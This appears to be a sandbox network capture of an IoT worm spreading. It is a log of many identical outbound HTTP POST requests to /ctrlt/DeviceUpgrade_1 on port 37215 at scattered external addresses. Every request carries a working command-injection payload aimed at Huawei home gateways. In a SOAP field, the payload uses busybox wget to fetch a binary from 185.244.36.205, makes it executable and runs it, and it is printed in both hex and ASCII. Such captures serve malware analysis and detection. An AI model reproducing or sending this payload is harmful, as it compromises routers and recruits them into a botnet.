                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1804192.168.2.155809437.15.179.17537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947061062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1805192.168.2.1536712157.25.143.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947088003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1806192.168.2.1560450156.123.189.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947102070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1807192.168.2.153326641.195.102.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947123051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1808192.168.2.1557980156.35.106.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947132111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1809192.168.2.155677494.136.131.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947150946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1810192.168.2.1551710122.164.250.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947175026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1811192.168.2.1550638121.80.156.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947211981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1812192.168.2.1541198102.216.14.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947230101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1813192.168.2.155229441.99.241.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947232008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1814192.168.2.1533584181.22.135.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947247982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
